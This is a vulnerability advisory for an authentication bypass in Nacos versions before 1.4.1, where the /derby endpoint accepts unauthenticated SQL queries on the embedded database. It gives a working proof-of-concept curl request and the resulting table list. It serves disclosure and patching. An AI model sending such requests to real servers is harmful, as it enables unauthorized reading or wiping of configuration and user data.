GHSA-xv5h-v7jh-p2qh
Suggest an improvement- Source
- https://github.com/advisories/GHSA-xv5h-v7jh-p2qh
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-xv5h-v7jh-p2qh/GHSA-xv5h-v7jh-p2qh.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-xv5h-v7jh-p2qh
- Aliases
- Published
- 2021-04-27T20:09:25Z
- Modified
- 2024-12-02T05:48:52.708521Z
- Summary
- Authentication bypass for specific endpoint
- Details
-
The
ConfigOpsControllerlets the user perform management operations like querying the database or even wiping it out. While the/data/removeendpoint is properly protected with the@Securedannotation, the/derbyendpoint is not protected and can be openly accessed by unauthenticated users.For example, the following request will list the tables of the database:
❯ curl -X GET 'http://console.nacos.io/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st' {"code":200,"message":null,"data":[{"TABLENAME":"APP_CONFIGDATA_RELATION_PUBS"},{"TABLENAME":"APP_CONFIGDATA_RELATION_SUBS"},{"TABLENAME":"APP_LIST"},{"TABLENAME":"CONFIG_INFO"},{"TABLENAME":"CONFIG_INFO_AGGR"},{"TABLENAME":"CONFIG_INFO_BETA"},{"TABLENAME":"CONFIG_INFO_TAG"},{"TABLENAME":"CONFIG_TAGS_RELATION"},{"TABLENAME":"GROUP_CAPACITY"},{"TABLENAME":"HIS_CONFIG_INFO"},{"TABLENAME":"PERMISSIONS"},{"TABLENAME":"ROLES"},{"TABLENAME":"SYSALIASES"},{"TABLENAME":"SYSCHECKS"},{"TABLENAME":"SYSCOLPERMS"},{"TABLENAME":"SYSCOLUMNS"},{"TABLENAME":"SYSCONGLOMERATES"},{"TABLENAME":"SYSCONSTRAINTS"},{"TABLENAME":"SYSDEPENDS"},{"TABLENAME":"SYSDUMMY1"},{"TABLENAME":"SYSFILES"},{"TABLENAME":"SYSFOREIGNKEYS"},{"TABLENAME":"SYSKEYS"},{"TABLENAME":"SYSPERMS"},{"TABLENAME":"SYSROLES"},{"TABLENAME":"SYSROUTINEPERMS"},{"TABLENAME":"SYSSCHEMAS"},{"TABLENAME":"SYSSEQUENCES"},{"TABLENAME":"SYSSTATEMENTS"},{"TABLENAME":"SYSSTATISTICS"},{"TABLENAME":"SYSTABLEPERMS"},{"TABLENAME":"SYSTABLES"},{"TABLENAME":"SYSTRIGGERS"},{"TABLENAME":"SYSUSERS"},{"TABLENAME":"SYSVIEWS"},{"TABLENAME":"TENANT_CAPACITY"},{"TABLENAME":"TENANT_INFO"},{"TABLENAME":"USERS"}]}%These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)
- Database specific
{ "nvd_published_at": "2021-04-27T21:15:00Z", "cwe_ids": [ "CWE-306" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2021-04-27T20:08:49Z" }- References
Affected packages
Maven / com.alibaba.nacos:nacos-common
Package
- Name
- com.alibaba.nacos:nacos-common
- View open source insights on deps.dev
- Purl
- pkg:maven/com.alibaba.nacos/nacos-common
Affected ranges
- Type
- ECOSYSTEM
- Events
-
Introduced0Unknown introduced version / All previous versions are affectedFixed1.4.1
Affected versions
0.*
0.1.0
0.2.0
0.2.1-RC1
0.2.1
0.3.0-RC1
0.3.0
0.4.0
0.5.0
0.6.0
0.6.1
0.6.2
0.8.0
0.8.1
0.8.2
0.9.0
0.9.1
1.*
1.0.0-RC1
1.0.0-RC2
1.0.0-RC3
1.0.0-RC4
1.0.0
1.0.1
1.1.0
1.1.1
1.1.2
1.1.3
1.1.4
1.2.0-beta.0
1.2.0-beta.1
1.2.0
1.2.1
1.3.0
1.3.1-BETA
1.3.1-BETA.1
1.3.1
1.3.2
1.3.3
1.4.0-BETA
1.4.0